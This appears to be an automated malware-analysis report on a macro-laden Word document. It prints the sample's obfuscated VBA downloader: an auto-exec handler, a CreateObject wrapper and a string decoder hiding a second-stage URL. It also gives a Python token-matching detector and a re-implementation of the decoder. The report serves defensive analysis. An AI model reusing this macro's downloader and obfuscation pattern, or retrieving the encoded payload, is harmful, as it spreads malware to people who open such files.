Verdict: MALICIOUS
Risk Score: 202
Malware Insights
MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1566.001 Phishing: Spearphishing Attachment
The sample contains VBA macros, including a Document_Open handler, so the code runs as soon as the document is opened with macros enabled; this is a common initial-execution technique. The macro calls CreateObject and CallByName, which let it instantiate a COM object from a ProgID held in a string and invoke methods on that object by name at runtime, so neither the object type nor the method names need to appear as plain identifiers in the source. The document also carries a macro-enable lure, which further supports malicious intent. The VBA is heavily obfuscated: randomly named identifiers, junk functions that call into one another, and string constants that are rebuilt at runtime by a decoder function (eBWgjQfjhIw.AVMNIazH). Its control flow, in which Document_Open calls into a routine that decodes a string, creates an object, passes the decoded string to it, and hands the result to helpers in modules beyond the preview, suggests a downloader for a second-stage payload. The three URLs listed under Embedded URL are standard OOXML schema namespaces present in any modern Office document and are not indicators on their own.
Heuristics (7)
- VBA macros detected (medium, 4 related findings) OLE_VBA_MACROS: Document contains VBA macro code
- Document_Open macro (high) OLE_VBA_DOCOPEN: Document_Open auto-execution macro
- CreateObject call (high) OLE_VBA_CREATEOBJ: CreateObject call
- CallByName call (high) OLE_VBA_CALLBYNAME: CallByName call
- VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Macro/content-enable lure (medium) SE_ENABLE_LURE: Document instructs the user to enable macros or editing, a common technique used by malware droppers to bypass Office macro security settings
- Embedded URL (info) EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
  - http://schemas.openxmlformats.org/officeDocument/2006/bibliography (in document text, OLE body)
  - http://schemas.openxmlformats.org/officeDocument/2006/customXml (in document text, OLE body)
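As an added example (not the analyzer's own rule set, and not code from the sample), the following Python shows the shape of the check behind findings like OLE_VBA_PCODE_AUTOEXEC_EXEC: an auto-execution entry point must co-occur with an object-creation, shell or download token before the document is flagged, so that a harmless Document_Open that only touches formatting does not fire. The token lists are my own selection of common names, not the analyzer's, and it scans source text rather than the compiled p-code stream the heuristic name refers to; the two constructed inputs are a short excerpt modelled on this sample's macro and a benign control.

```python
import re

# Added example: a minimal "auto-exec token together with execution tokens"
# check over VBA source text. Token lists are an assumption (common names),
# not the analyzer's actual rule set.

AUTOEXEC = ("Document_Open", "AutoOpen", "Auto_Open", "Workbook_Open",
            "Document_Close", "AutoClose", "AutoExec")
EXECUTION = {
    "object":   ("CreateObject", "GetObject", "CallByName"),
    "shell":    ("Shell", "WScript.Shell", "ShellExecute"),
    "download": ("XMLHTTP", "WinHttpRequest", "ResponseBody",
                 "URLDownloadToFile", "ADODB.Stream", "SaveToFile"),
}


def _hits(source: str, tokens) -> list:
    # Whole-word, case-insensitive match: VBA identifiers are case-insensitive.
    return [t for t in tokens
            if re.search(r"\b" + re.escape(t) + r"\b", source, re.IGNORECASE)]


def scan_vba(source: str) -> dict:
    """Report auto-exec and execution tokens; alert only when both classes occur."""
    report = {"autoexec": _hits(source, AUTOEXEC)}
    for cls, tokens in EXECUTION.items():
        report[cls] = _hits(source, tokens)
    report["alert"] = bool(report["autoexec"]) and any(report[c] for c in EXECUTION)
    return report


# Constructed input modelled on the preview: the entry point plus the
# CreateObject wrapper. The Send/ResponseBody/ProgID strings are absent on
# purpose, because this sample only produces them at runtime from its decoder.
MACRO_EXCERPT = """\
Private Sub Document_Open()
    RHBhAAofFSwH.BvSglhMnlnaDVz
End Sub
Public Function jJtlttobqgM(ByVal SlZHI As String, ByVal pgIDrJcMBrA As String) As Object
    Set jJtlttobqgM = CreateObject(pgIDrJcMBrA)
End Function
"""

# Constructed benign control: an auto-exec handler with no execution tokens.
BENIGN_MACRO = """\
Private Sub Document_Open()
    ActiveDocument.Range.Font.Size = 11
End Sub
"""

if __name__ == "__main__":
    for name, src in (("excerpt", MACRO_EXCERPT), ("benign", BENIGN_MACRO)):
        print(name, scan_vba(src))
```

On the excerpt the alert comes purely from Document_Open plus CreateObject; the download class is empty because the method and property names are hidden behind the string decoder. That gap is why the analyzer pairs this source-level check with the p-code variant and with the CallByName finding: once a sample resolves its API names at runtime, the source shows the mechanism of indirection rather than the API it reaches.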
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 14516 bytes |

SHA-256: b2900d0093472c10bbf2806b9689a9e85b40dbe0b3840e1975734c8521a721fb

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function oTrJRUiGzbmAjp(ByVal fMMlxLyA As String, ByVal korOJjXYfruaWu As String) As Integer
dITUKjnybi
cWKjkN = 6891
tzYfvhfWr 4165
fYiYXZWnaF 7578, "kPk7"
If qVIraQOSQdg Then
rkELOtduOlbLaN "WEVbs", True, "mQ"
SCMKJuiPEnJr "2Q", True
ymwyGPOHGlKHLU
Else
IflLUgUwxSdDTU 1146
End If
oTrJRUiGzbmAjp = 5291
End Function
Private Sub UOQng(ByVal ixDAVcPdsJ As String, ByVal idIXNzbajJyE As Integer)
yLEvf "NoI2P", 5222, True
hpxHFuHiGmT
AfTxHKuXEqwUm 7063
End Sub
Private Function wtZrHgAcDXn() As String
If XbqMhYUUyd Then
EclMZv
Else
lIZnCuxOxGIFSV 2523
End If
wtZrHgAcDXn = "21Q"
End Function
Private Sub Document_Open()
Dim YaAVkXQN As String
EVZlyY = 5132
RHBhAAofFSwH.BvSglhMnlnaDVz
End Sub
Private Function DypxaDRbHpL(ByVal fkmpOF As Integer, ByVal hNqhRcHGxs As String) As Boolean
FeHUJPfv 564, 1218, ""
BagoctPHSm = 5855
sTuNZ 1901, ""
aEcTgHlnXA 7473
IXhFgAspjk 238, "", ""
DypxaDRbHpL = False
End Function
Attribute VB_Name = "RHBhAAofFSwH"
Private Sub XeLWAzcdzEAN()
Dim plDzVuWJrNYd As Integer
iYpwuTOXA = 7110
hbxlTIXG kuenhNKZHjWn.MrTyAqxxvIA, 1503, GXuXmAk
kuenhNKZHjWn.hAUGh kuenhNKZHjWn.MrTyAqxxvIA
End Sub
Public Sub BvSglhMnlnaDVz()
qYbKtXcljs = 4891
On Error GoTo aFeTncetDk
FhrMiqUNDTs.ZezwW
FhrMiqUNDTs.IdgdOJAsbh
XeLWAzcdzEAN
Exit Sub
aFeTncetDk:
End Sub
Private Sub hbxlTIXG(ByVal nDvPAqheCgvC As String, ByVal CvwmCirOSiA As Integer, ByVal mETWg As String)
Dim tlUqwnGHwArleW As Integer
Set LXRCrUQf = XUGkC.srlQFV("WQ", mETWg, "")
XUGkC.JCrtX LXRCrUQf, eBWgjQfjhIw.AVMNIazH("CSajSn'UUtU dJpo9w5nlSo5UadS gjbiSn.5a9ry5J f.i9lJpe", "gp.9SJ5Uj")
kuenhNKZHjWn.vWpHsSWsYmpA nDvPAqheCgvC, GEZrz.bELGJfAfCOgKR(LXRCrUQf, eBWgjQfjhIw.AVMNIazH("R7 emsp oQ3nsmemB5mod y ", "5 7Dm3.Q"))
End Sub
Public Function jJtlttobqgM(ByVal SlZHI As String, ByVal pgIDrJcMBrA As String) As Object
Dim zWqwTojhqvNL As String
Dim dKQGcfy As String
Set jJtlttobqgM = lRyXdK(CreateObject(pgIDrJcMBrA), False, False)
End Function
Private Function lRyXdK(ByVal hwNQsgHEEiDJeH As Object, ByVal iDUhqRdC As Boolean, ByVal zzZCye As Boolean) As Object
Set lRyXdK = hwNQsgHEEiDJeH
End Function
Private Function GXuXmAk() As String
GXuXmAk = eBWgjQfjhIw.AVMNIazH("Yh9tWtpWb:/M/9Yra9vLYirYa9jLbibt.YMcoYmW/Mc9aWLta9lLo9Lg/bbobffM9i9ceb19W1M.WdYatY", "bY9WML")
End Function
Attribute VB_Name = "eBWgjQfjhIw"
Public Function AVMNIazH(ByVal ZlRMAVh As String, ByVal yJNNSuq As String) As String
Dim PJLZiTNtCw As Boolean
For NdmaQKDd = nxJuDe To dqIVYvHE.MgQrTNETrE("xXY8", ZlRMAVh)
AVMNIazH = dqIVYvHE.zGDMD("tT0p", AVMNIazH, 8054, BYtINm(yJNNSuq, dqIVYvHE.BtDlHivpfi(NdmaQKDd, "XtPYK", ZlRMAVh)))
Next
End Function
Private Sub MgOiZe(ByVal vVQOUSNHs As Boolean)
yiSFKZgeSNGk = "GJ7f"
jxTlwzlDaIi 4633, "Ew"
aQTGZR "", "gvuDw", "ZyWtX"
KXOjJHap = False
hgEnDKr "Hw"
SJyURfjBRkaV 7882
sOsafGUVjsAoN = 779
ZIjxeZ
End Sub
Private Sub CQzyhkFCsow()
If UPpNAZTDIjPRSz Then
RHjZIHZieSSv
dWMnFigez = "vg"
End If
End Sub
Private Function BYtINm(ByVal tWQwF As String, ByVal uLQjIXFHlTZaXW As String) As String
Dim DiCBaVwB As Integer
Dim KOcchZShYiiG As String
If Not dqIVYvHE.hHXEirfQJGj(uLQjIXFHlTZaXW, "weA", tWQwF, 4638) Then
BYtINm = uLQjIXFHlTZaXW
End If
End Function
Private Function nxJuDe() As Integer
wZgPY = "UzY"
nxJuDe = 1
End Function
Attribute VB_Name = "XUGkC"
Private Function kOkUJKgYuaN() As String
sMvsvbZz
CHKprZUiSIEFM "zaGCZ", "4ljQ", 1389
ZqrydnaQhbsc
EYrqIZmkd 2198, 3506, 5073
OkdaTZlK
kOkUJKgYuaN = "pNAw"
End Function
Private Function MXSWw() As Integer
MXSWw = 400
End Function
Public Sub JCrtX(ByVal dfmziVayJSq As Object, ByVal bGgylGzHEoyO As String)
GEZrz.mxThoSOVnUMNZ dfmziVayJSq, eBWgjQfjhIw.AVMNIazH("iSe 7nid", "Zip3 7o")
If GEZrz.bELGJfAfCOgKR(dfmziVayJSq, USHsp
... (truncated)
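As an added example (not part of the analyzer report and not the sample's own code), the following Python re-implements the string decoder eBWgjQfjhIw.AVMNIazH as it reads in the preview and runs it over the four encoded constants that appear there. AVMNIazH walks its first argument one character at a time and appends BYtINm(key, char) to the result, and BYtINm returns the character only when it is not found in the key, so the scheme is a character filter: the key lists the junk characters that were sprinkled into the real string. The helper module dqIVYvHE lies beyond the truncated preview, so reading its helpers as Len, Mid, InStr and string concatenation is an assumption; that all four constants decode to readable text is the check that the assumption holds.

```python
# Added example: re-implementation of the sample's string decoder
# eBWgjQfjhIw.AVMNIazH / BYtINm, as read from the extracted macro source.
# Assumption: the helpers in the truncated module dqIVYvHE are Len, Mid(s, i, 1),
# InStr (binary, case-sensitive compare) and string concatenation.

def decode(encoded: str, key: str) -> str:
    """Drop every character of `encoded` that also occurs in `key` (case-sensitive)."""
    junk = set(key)
    return "".join(ch for ch in encoded if ch not in junk)


# (encoded string, key) pairs copied verbatim from the macro preview, keyed by
# the routine that uses them.
CONSTANTS = {
    "JCrtX / error message":
        ("CSajSn'UUtU dJpo9w5nlSo5UadS gjbiSn.5a9ry5J f.i9lJpe", "gp.9SJ5Uj"),
    "hbxlTIXG / property name":
        ("R7 emsp oQ3nsmemB5mod y ", "5 7Dm3.Q"),
    "JCrtX / method name":
        ("iSe 7nid", "Zip3 7o"),
    "GXuXmAk / URL":
        ("Yh9tWtpWb:/M/9Yra9vLYirYa9jLbibt.YMcoYmW/Mc9aWLta9lLo9Lg/bbobffM9i9ceb19W1M.WdYatY",
         "bY9WML"),
}


def decode_all() -> dict:
    """Decode every constant from the preview and return {label: plaintext}."""
    return {label: decode(enc, key) for label, (enc, key) in CONSTANTS.items()}


if __name__ == "__main__":
    for label, plain in decode_all().items():
        print(f"{label:26s} -> {plain!r}")
```

Run stand-alone, the three short constants come out as an error message about failing to download a binary file, the property name ResponseBody and the method name Send, which is consistent with an XMLHTTP- or WinHttpRequest-style object being created by jJtlttobqgM, sent, and its response body written out; the constant returned by GXuXmAk decodes to a plain http:// URL to a .dat file, the second-stage location the summary infers. The decoded URL is worth treating as an indicator only after the reading of dqIVYvHE is confirmed against the full source or a sandbox run, since the preview stops before that module.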